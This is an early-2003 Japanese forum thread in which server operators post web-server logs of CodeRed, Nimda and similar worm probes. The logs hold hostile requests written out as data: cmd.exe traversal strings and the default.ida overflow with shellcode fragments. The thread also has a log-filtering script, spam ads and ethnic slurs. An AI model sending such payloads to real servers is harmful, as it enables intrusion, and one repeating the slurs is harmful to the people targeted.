この鯖ワームにやられてます

自宅で鯖も善いけど、管理はちゃんとしようよ。
ログを汚すだけではなく、ネットワーク資源のムダ使いの
CodeRedやNimdaその他のワームにやられてる鯖を教え合おう!!

管理者がこの板みて、対処を期待する。

2 get!!

おー鯖管理に関する話題だな。
でもな、ワームによってはIP詐称してるのもアルからな
そういうのはどうする>>1 ?

IP詐称されてるってのが分かるだけでも当人？としては
いいかも。やっぱ気持ち悪いじゃん。

ところで3ｽﾞｻ━━━━⊂(ﾟДﾟ⊂⌒｀つ≡≡≡━━━━!!

ラストクリスマスｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━━!!!!!

218.86.248.174 [08/Feb/2003:08:26:23 +0900] - > GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
218.114.46.157 [08/Feb/2003:10:57:07 +0900] - > GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0

知らんなら本人に気づいて欲しいという意味でも晒しとくよ

無駄。apache のlogに記録されない様にするのがいい。

>>5
あんたYahooBBかい？

>>4
それはワム

>>7
あんた馬鹿の一つ覚えを繰り返してるゴミ送信主かい？

>>6
どうやってやるんですか？

>>9
うちもYahooBBで、YahooBBにしてから(IPアドレスが218.*.*.*になってから)Nimdaの攻撃が激増したから聞いているだけなんだけど・・・

>>10
ここでも嫁
ttp://www.zdnet.co.jp/help/tips/linux/l0324.html

>>4
>>8
ﾜﾗﾀ

こういうのってプロバイダに通報した方がいいの？

>>11
確かに、YahooBB(218.*.*.* と219.*.*.*がほとんど43.*.*.* 220.*.*.*は少ない）
はNimdaの攻撃が多い。www.bbtec.netはApache使ってるし
DNS(dns**.bbtec.net)はBIND8使ってるから、一般ユーザが感染していると考えられる。
常時接続で、知らぬ間にIIS探ししてるんだよね。１スキャンで１６ヒットするから
ログ解析ツールwebalizer,mrtgその他を使うとすぐ分る。
根本解決は管理者に教えてあげることだけど、めんどくさく、難しい事も多い。
逆引き出来れば良い方で、IP偽ってるのも結構ある。
対処方法は、>>6　が言っているようにログに残らないようにするのが簡単。

仮にも管理者が決まっている鯖なら、いくらぐーたらでも
さすがにCodeRed/Nimda/Slammer級のワームについては対策されてると思いたいが。。。

今ごろになってもNimdaやらまきちらしてるのは
知らないうちにIISが動いてて持ち主も把握してないようなマシンだろう。
そういう「持ち主」はいても「管理者」はいないようなマシンは
リプレースされるまでそのままだと思うよ。

久々にNIMDA来た
219.180.170.51 - - [09/Feb/2003:22:38:17 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 447

久々にCodeRed来た
80.204.44.179 - - [10/Feb/2003:00:34:17 +0900] "GET /default.ida?NNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u5
31b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 309 "-" "-"

ぷららのＤＤＮＳだけどぷららも結構多いよ。
nslookupで引くとほとんどがぷららさん・・・

>19 いまだにnslookup

（　´,_ゝ｀）フ゜ッ

ネームサーバをさせるわけでもないのに、
わざわざ dig や host のために bind for win をインストールしたり、
dnsip やら dnsipq やらのためにわざわざパッチ当てて
djbdns をコンパイルするのはアレだし。
この程度のことならば nslookup でも特に問題にならんと思うんだけど、
他に Windows で使えるいいツール知らんかい？ >>20

218.200.211.35 - - [10/Feb/2003:07:28:37 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 318 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:28:41 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 316 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:28:42 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:28:42 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:04 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:05 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 357 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:06 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 357 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:07 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 373 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:07 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:08 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:09 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:10 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:10 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 323 "-" "-"
218.200.211.35 - - [10/Feb/2003:07:29:11 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 323 "-" "-"

自動的にワームからのアクセスがあったときに

root@アクセス元IPアドレス

とかに警告メール出すようなソフトだれか作ってくり。

>>23
http://reuven.lerner.co.il/projects/Apache-CodeRed-1.07.tar.gz

>>24
make test
PERL_DL_NONLAZY=1 /usr/bin/perl -Iblib/arch -Iblib/lib -I/usr/libdata/perl/5.00503/mach -I/usr/libdata/perl/5.00503 test
.pl
1..1
Can't locate warnings.pm in @INC (@INC contains: blib/arch blib/lib /usr/libdata/perl/5.00503/mach /usr/libdata/perl/5.0
0503 /usr/libdata/perl/5.00503/mach /usr/libdata/perl/5.00503 /usr/local/lib/perl5/site_perl/5.005/i386-freebsd /usr/loc
al/lib/perl5/site_perl/5.005 .) at blib/lib/Apache/CodeRed.pm line 4.
BEGIN failed--compilation aborted at blib/lib/Apache/CodeRed.pm line 4.
BEGIN failed--compilation aborted at test.pl line 10.
*** Error code 2

Stop in /tmp/Apache-CodeRed-1.07

http://bbs.1oku.com/bbs/bbs.phtml?id=rantyan
★ココだ★ココだ★

>>23
警告メールは、やっぱり、

「回線切って、首つって、氏ね」

みたいなの？

>>19
それってぷららのDDNS使ってるからじゃない？
Nimdaはご近所さん攻撃するものだし。

確かにNimdaは感染したマシンのセグメント付近に攻撃するよね。
所詮DDNSは、とりあえず立てましたって人が使うから管理甘いのよね。

>>23
こんだけ騒がれてるのにいまだにワームをまきちらかしてるような奴が
そんなの読むわけないと思われ。
だいたいWindowsが多いんだからrootに出してもまず無意味。
net send(smbclient -M)を送り返すとかしたほうがまだしも効果があるだろう。

ピコ郎

久々だな。
62.217.134.16 - - [13/Feb/2003:19:21:53 +0900] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%
u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 226

最近codered多くない？　しばらくこなかったけど
最近1日3回位くるYO　ちなみに屋不ーBB

[Thu Feb 13 18:32:04 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..ﾁ/winnt/system32/cmd.exe
[Thu Feb 13 18:32:05 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..ﾀｯ/winnt/system32/cmd.exe
[Thu Feb 13 18:32:05 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..ﾁ?/winnt/system32/cmd.exe
[Thu Feb 13 18:32:07 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..%5c/winnt/system32/cmd.exe
[Thu Feb 13 18:32:07 2003] [error] [client 61.136.62.193] File does not exist: d:/network/server/apache/dcroot/scripts/..%2f/winnt/system32/cmd.exe

俺みたいにISDNで鯖をやってるようなﾔｼの所にも来るのか・・・

>>33
うちもYahoo!BBだよ。
多すぎってほどじゃないけど、やっぱり日に２〜５件くらいはくるですねぇ。

……と、access_logをgrepして気が付きますた。
全然久々じゃないじゃないか (w

お前らみたいな糞坊が鯖なんか立てるから、ｳｨﾙｽが万円して逝くんだよ
もっと勉強してから立てれ

漏れの所も…

その1
[Fri Feb 14 21:44:55 2003] [error] [client 219.180.88.58] File does not exist: /var/www/html/scripts
[Fri Feb 14 21:44:55 2003] [error] [client 219.180.88.58] File does not exist: /var/www/html/MSADC
[Fri Feb 14 21:44:56 2003] [error] [client 219.180.88.58] File does not exist: /var/www/html/c
[Fri Feb 14 21:44:56 2003] [error] [client 219.180.88.58] File does not exist: /var/www/html/d

その2
[Sat Feb 15 01:25:25 2003] [error] [client 219.185.44.146] File does not exist: /var/www/html/scripts
[Sat Feb 15 01:25:25 2003] [error] [client 219.185.44.146] File does not exist: /var/www/html/MSADC
[Sat Feb 15 01:25:25 2003] [error] [client 219.185.44.146] File does not exist: /var/www/html/c
[Sat Feb 15 01:25:25 2003] [error] [client 219.185.44.146] File does not exist: /var/www/html/d

両方ともにahoo!BB。
頼むよ。漏れもahoo!BBなんだけどさ（涙

一週間で1000リクエストほどワーム来るね

うちもぷららのDDNS使ってますが、サーバ開通直後に
わんさか来たので、ログの一部をサポートセンターに
送って対処をお願いしたら、それ以後は随分少なく
なりましたよ。まあ、偶然かもしれませんが...

やっぱり偶然でした(T_T)

どうやら、土日はお休みで電源が落ちていただけの模様です。
ただのパソコンなんだろうな...

友人のケースでは、相手を特定して電話してやっと解決したってケースがありました。
相手は設計事務所のサーバーだったそうです。　それだから連絡先がわかった、と
いうことでもありますが。　プロバイダーはシカトを決め込んでいたそうです。

少々のワームやウイルスはいちいちかまってられないが、
前OCNユーザーから1日200通のウイルスメールがきたときは
さすがにたまりかねてOCNに連絡したよ…

鯖とは関係ない話だがな…

218.9.76.4 - - [07/Mar/2003:22:22:26 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215

218.11.16.6 - - [06/Mar/2003:21:32:04 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215

218.4.144.106 - - [06/Mar/2003:21:09:25 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215

218.12.182.39 - - [06/Mar/2003:07:46:12 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215

いい加減蝋人形にしちゃうよ？！

218.9.6.222 - - [08/Mar/2003:12:13:13 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"

218.18.18.72 - - [08/Mar/2003:15:38:43 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"

218.27.89.97 - - [08/Mar/2003:18:23:39 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"

218.6.243.62 - - [08/Mar/2003:19:01:17 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"

218.244.75.70 - - [08/Mar/2003:20:31:32 +0900]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-" "-"

いい加減蝋人形にしちゃうよ？！

本日のニムダアクセス
韓国　61.250.216.1
中国　61.132.75.252

#!/bin/sh

if [ $1 ] && [ -f $1 ]; then
ACCESS_LOG=$1
elif [ -f /usr/local/apache/logs/access_log ]; then
ACCESS_LOG=/usr/local/apache/logs/access_log
else
echo "usage: $0 path_to_access_log"
exit 1
fi

egrep "cmd.exe|root.exe|NNNNNN" $ACCESS_LOG \
| awk '{ print $4,$5,$1; }' \
| sort -k 3,3 -u | sort -k 1,1 \
| sed -e 's/^/スキャン歓迎: /g' | more

exit 0

ﾜﾗﾀ

"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215

上のようなログがたくさんあるんですが、404じゃなくて302なのです・・・。
なんでかわかるかた教えてくださいｍ（＿＿）ｍ

これはどうなのかな。。。

[Sun Mar 09 23:10:05 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..ﾁ/winnt/system32/cmd.exe
[Sun Mar 09 23:10:07 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..ﾀｯ/winnt/system32/cmd.exe
[Sun Mar 09 23:10:09 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..ﾁ・winnt/system32/cmd.exe
[Sun Mar 09 23:10:15 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..%5c/winnt/system32/cmd.exe
[Sun Mar 09 23:10:20 2003] [error] [client 218.78.252.218] File does not exist: c:/www/scripts/..%2f/winnt/system32/cmd.exe

　 ∋8ノノハ.∩
　　 川o・-・）ノ　＜先生！こんなのがありました！
＿_/ / 　 　/ 　　
＼(_ﾉ￣￣￣＼
||ヽ||￣￣￣￣||
　...||￣￣￣￣||
http://saitama.gasuki.com/saitama/

うちも、ﾁｮﾝとﾁｬﾝｺﾛばっかりです。

http://www.arearesearch.co.jp/ip-kensaku.html

今日は珍しく、アメリカのDSL回線とアラブ首長国連邦があった

　　　　　　　ま　　　　た　　　　中　　　　国　　　　か

default.ida?XXXXX...増殖中。
0件: 5/Mar
0件: 6/Mar
0件: 7/Mar
0件: 8/Mar
0件: 9/Mar
0件: 10/Mar
12件: 11/Mar
48件: 12/Mar

上にもあるが、最近こんなヤシが来るんですがこれもCODEREDだよね？
2003/03/13(13:14:12) W-SV 219.*.***.*** [80] 404 237 "GET /
default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXY090V858\bd3W801Y090
V858\bd3W801Y090V858\bd3W801Y090Y090X190P0c3P003Xb00U31bU3ffP078
P000P0=a HTTP/1.0"
今まで見たNNNってヤシと違うもんだから気になって、、

http://www.pink-angel.jp/betu/linkvp2/linkvp.html
★その目で確認すべし！！★超おすすめ★

>>52
国際的ですね（w

（＾＾）

ほぼ毎日、韓国、中国。たまに日本。

韓国と中国がものすごく多い。
あと、日本国内だと普通の企業とか。

ここ数日はCodeRed IIが多いですね、国内外を問わず。
荒らしてくれるのは、
愛知、神奈川、埼玉あたりが多いです。

我々に直接的な害はないんですがね。
見てて気持ち悪いですよ。

こんなの出てた
61.191.128.106 - - [15/Mar/2003:20:26:20 +0900] "GET /default.ida?XXXX
XXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 275
61.48.32.168 - - [15/Mar/2003:20:33:57 +0900] "GET /default.ida?XXXXXX
XXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 275
61.83.171.22 - - [15/Mar/2003:22:54:03 +0900] "GET /default.ida?XXXXXX
XXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 276

CodeRedII多いなぁ
219.168.40.15 - - [15/Mar/2003:06:09:38 +0900] "GET /default.ida?XXXXXXXXXXXXXX
219.93.193.170 - - [15/Mar/2003:12:12:01 +0900] "GET /default.ida?XXXXXXXXXXXXX
219.94.102.51 - - [15/Mar/2003:16:44:21 +0900] "GET /default.ida?XXXXXXXXXXXXXX
219.145.159.175 - - [15/Mar/2003:17:57:31 +0900] "GET /default.ida?XXXXXXXXXXXX
219.138.9.227 - - [15/Mar/2003:19:18:09 +0900] "GET /default.ida?XXXXXXXXXXXXXX

218.64.67.194 - - [15/Mar/2003:18:26:32 +0900] "GET /default.ida?XXXXXXXXX
流行ってるね。

設置者は居ても、管理者が居ない鯖が多いということで

★あなたのお悩み解決致します！！
●浮気素行調査
彼氏、彼女、妻、夫の浮気を調査致します！！
●盗聴器盗撮機発見
あなたの部屋に誰かが仕掛けているかも！！
●行方調査
行方不明になっている家族の消息を調査致します！！
●電話番号から住所割り出し
一般電話、携帯から住所を割り出し致します！！
●ストーカー対策
社会問題ともなっているストーカーを撃退致します！！
その他人生相談からどんなお悩みでも解決いたします！！
　直通　　０９０−８５０５−３０８６
ＵＲＬ　　http://www.h5.dion.ne.jp/~grobal/
メール　　[email protected]
　　　グローバル探偵事務局　

003/03/16(20:32:54) W-SV 61.199.98.125 [80] 200 950 "GET /kiyaku.html HTTP/1.1"
2003/03/16(20:33:31) W-SV 61.251.250.14 [80] 404 242 "GET /scripts/root.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:32) W-SV 61.251.250.14 [80] 404 240 "GET /MSADC/root.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:32) W-SV 61.251.250.14 [80] 404 250 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:33) W-SV 61.251.250.14 [80] 404 250 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:36) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/scripts/..\../winnt/system32/cmd.exe" ]"
2003/03/16(20:33:36) W-SV 61.251.250.14 [80] 403 262 "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:37) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/_vti_bin/..\../..\../..\../winnt/system32/cmd.exe" ]"
2003/03/16(20:33:37) W-SV 61.251.250.14 [80] 403 275 "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:41) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/_mem_bin/..\../..\../..\../winnt/system32/cmd.exe" ]"
2003/03/16(20:33:41) W-SV 61.251.250.14 [80] 403 275 "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:44) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/msadc/..\../..\../..\/..ﾁ../..ﾁ../..ﾁ../winnt/system32/cmd.exe" ]"
2003/03/16(20:33:44) W-SV 61.251.250.14 [80] 403 291 "GET /msadc/..%5c../..%5c../..%5c/..ﾁ../..ﾁ../..ﾁ../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/03/16(20:33:45) W-SV 61.251.250.14 [80] E200035 " .. が含まれるリクエストは許可されていません。[ 61.251.250.14 "/scripts/..ﾁ../winnt/system32/cmd.exe" ]"
2003/03/16(20:33:45) W-SV 61.251.250.14 [80] 403 263 "GET /scripts/..ﾁ../winnt/system32/cmd.exe?/c+dir HTTP/1.0"

>68
規約ってなんだっ

CodeRedIIウザー（´Д｀；
219.138.52.14 - - [19/Mar/2003:00:45:01 +0900] "GET /default.ida?
219.234.238.253 - - [18/Mar/2003:18:09:40 +0900] "GET /default.ida?
219.215.44.61 - - [18/Mar/2003:20:44:08 +0900] "GET /default.ida?
219.138.1.212 - - [19/Mar/2003:01:34:27 +0900] "GET /default.ida?
219.68.217.243 - - [19/Mar/2003:01:50:51 +0900] "GET /default.ida?

中国でもWindowsServer使ってるのか・・・
テストのため1日晒してただけで結構来るねぇ。

迷惑。マシンごと逝ってくれ、とくに220.13.136.85

YahooBB220013136085.bbtec.net - - [18/Mar/2003:04:00:21 +0900] "GET /default.ida?XXXXXXXXX
YahooBB220013232179.bbtec.net - - [18/Mar/2003:07:09:43 +0900] "GET /default.ida?XXXXXXXXX
YahooBB220027008006.bbtec.net - - [19/Mar/2003:09:17:43 +0900] "GET /default.ida?XXXXXXXXX

>>71
うちも220.*.*.*からばかり来てるな。
まだそれほど多いと感じて無いけど。

61.236.229.237からCodeRedが北んで、何かと思ってアクセスしたら、
www.okxa.comというドメインのサイトですた。

何、ココ？エロゲサイト？

うちは、1日に、CodeRedが34回、Nimdaが32回なんてのも、
普通だす。
なんとかしたいのでつが・・・
サーバーは、BIGLOBEです。。

>>73
下にメアド書いてあるじゃん。とりあえず英語と中国語？で文句言ってみれば？

まぁ、MicroSoftのWebサイトにCodeRed.F対策のアナウンスが挙がってるんだから
身に覚えのある人はパッチをあてて欲しいですね

最近やたらCodeRedII多くないかい?
218.***.***.***から目茶苦茶(100/day程度)来るんだけど


あーうぜー

初めて見た。

210.220.73.20 - - [02/Apr/2003:06:56:31 +0900] "GET / HTTP/1.1" 200 765 "-" "-"
210.220.73.20 - - [02/Apr/2003:06:56:32 +0900] "GET /NULL.printer HTTP/1.1" 404
1059 "-" "-"
210.220.73.20 - - [02/Apr/2003:06:56:32 +0900] "GET /NULL.IDA?CCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%udacf%u77ee%u
0000%u0000%u838b%u0094%u0000%u408・・・以降文字化けで表示できない

SYN Flood Attackしてくる香具師もなんとかしる

>78
ウチにも来たよ
211.189.57.126から
最初はイタズラされてるだけあかと持ったんだけど、新しいワームかね？
相手はコーリャンのIISでした。

211.158.61.191 - - [06/Apr/2003:05:12:15 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:20 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:25 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:31 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:36 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:41 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:47 +0900] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:52 +0900] "GET /msadc/..%5c../..%5c../..%5c/..ﾁ../..ﾁ../..ﾁ../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:12:57 +0900] "GET /scripts/..ﾁ../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:13:02 +0900] "GET /scripts/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:13:08 +0900] "GET /../winnt/system32/cmd.exe HTTP/1.0" 403 194
211.158.61.191 - - [06/Apr/2003:05:13:13 +0900] "GET /../winnt/system32/cmd.exe HTTP/1.0" 403 194
211.158.61.191 - - [06/Apr/2003:05:13:18 +0900] "GET /scripts/..l5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:13:24 +0900] "GET /scripts/..l5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:13:29 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
211.158.61.191 - - [06/Apr/2003:05:13:34 +0900] "GET /scripts/..%2f../winnt/system32/cmd.exe HTTP/1.0" 404 215

ウザい。

中国、韓国からのアクセスは禁止!!

どかーん！
(⌒⌒⌒)
　｜｜

／￣￣￣￣￣＼
|　・　Ｕ　　　　　　|
| |ι　　　　 　　　　|つ
Ｕ｜｜ ￣￣ ｜｜
　　￣　　　　　￣
もうおこったぞう

61.232.0.1-61.237.255.254<!-- (CN)CHINA RAILWAY TELECOMMUNICATIONS CENTER -->
218.13.0.1-218.18.255.254<!-- (CN) CHINANET Guangdong province network Data Communication Division China Telecom -->
218.144.0.1-218.159.255.254<!-- (KR)KOREA TELECOM Network Management Center -->
220.64.0.1-220.71.255.254<!-- (KR)KRNIC Korea Network Information Center -->
220.72.0.1-220.87.255.254<!-- (KR)KOREA TELECOM Network Management Center -->
220.112.0.1-220.115.255.254<!-- (CN)Greatwall Broadband Network Co.Ltd. -->
220.163.0.1-220.165.255.254<!-- (CN)CHINANET yunnan province network China Telecom -->

アク禁

>80
>最初はイタズラされてるだけあかと持ったんだけど、

いたずらしないで頂きたい。

ログ汚れ過ぎ
ＩＩＳ狙われすぎ
ついでにｓａｇｅ過ぎ

あれ以来きてない。

>83
正解かも

どうもアタックの内容がアレなせいで落ちてるっぽいのよね
IPアドレスじゃなくてドメインで狙われてるっぽいし・・・

これは？

09.191.15.2 - - [09/Apr/2003:08:04:57 +0900] "GET /cgi-bin/formmail.pl HTTP/1.0" 404 1184
209.191.15.2 - - [09/Apr/2003:08:05:01 +0900] "GET /cgi-bin/formmail.cgi HTTP/1.0" 404 1184
209.191.15.2 - - [09/Apr/2003:08:05:03 +0900] "GET /cgi-bin/FormMail.pl HTTP/1.0" 404 1184
209.191.15.2 - - [09/Apr/2003:08:05:05 +0900] "GET /cgi-bin/FormMail.cgi HTTP/1.0" 404 1184
209.191.15.2 - - [09/Apr/2003:08:05:09 +0900] "GET /cgi-sys/formmail.pl HTTP/1.0" 404 1184
209.191.15.2 - - [09/Apr/2003:08:05:10 +0900] "GET /cgi-sys/formmail.cgi HTTP/1.0" 404 1184
wsip68-15-27-215.sd.sd.cox.net - - [09/Apr/2003:08:05:21 +0900] "GET /cgi-sys/formmail.cgi HTTP/1.0" 404 1184
wsip68-15-27-215.sd.sd.cox.net - - [09/Apr/2003:08:05:22 +0900] "GET /cgi-sys/FormMail.pl HTTP/1.0" 404 1184
wsip68-15-27-215.sd.sd.cox.net - - [09/Apr/2003:08:05:22 +0900] "GET /cgi-bin/Formmail.pl HTTP/1.0" 404 1184
wsip68-15-27-215.sd.sd.cox.net - - [09/Apr/2003:08:05:24 +0900] "GET /cgi-bin/mail.pl HTTP/1.0" 404 1184
wsip68-15-27-215.sd.sd.cox.net - - [09/Apr/2003:08:05:25 +0900] "GET /cgi-bin/FORMMAIL.PL HTTP/1.0" 404 1184

板違いだけどついでにこれも

0-2pool57-34.nas10.lansing2.mi.us.da.qwest.net - - [08/Apr/2003:13:58:44 +0900] "CONNECT mailin-04.mx.aol.com:25 HTTP/1.0" 405 992 "-" "-"

多分オープンプロキシの検索ロボットだけど、踏み台に利用されないように。

>>86 は任意の宛先に送信できるメール送信 CGI を狙った spammer。
>>87 は外部から任意のポートに接続できるプロクシを狙った spammer。

最近、CONNECT〜が増えてきましたね

あの手、この手ですよね。
まえにスパムを配信するウイルスの実験が行われていた可能性があると
記事で読んだ記憶があるけど。

スパムとワーム。何かオーバラップらして見えてくるのは自分だけかな。

メールヘッダーが変なんですけど。何かわかりますかね。
ヘッダーは２．４KBあり、､Comments:の行がやたら長いです。

本文はスパムみたいなんですけど、sendmailのバグを狙っているような．．．
ワームの様な気もしてます。。。

Return-Path: <[email protected]>
Received: from smtp1.cwidc.net (smtp1.cwidc.net [154.33.63.111])
by xxxx.jp (8.12.8/8.12.5)
with ESMTP id h3BDBGKZ017325 for <[email protected]>;
Fri, 11 Apr 2003 22:11:19 +0900
Received: from [154.33.63.58] (helo=mail8.cwidc.net)
by smtp1.cwidc.net
with esmtp (Exim 3.20 #4) id 193yJ3-0004So-00 for [email protected];
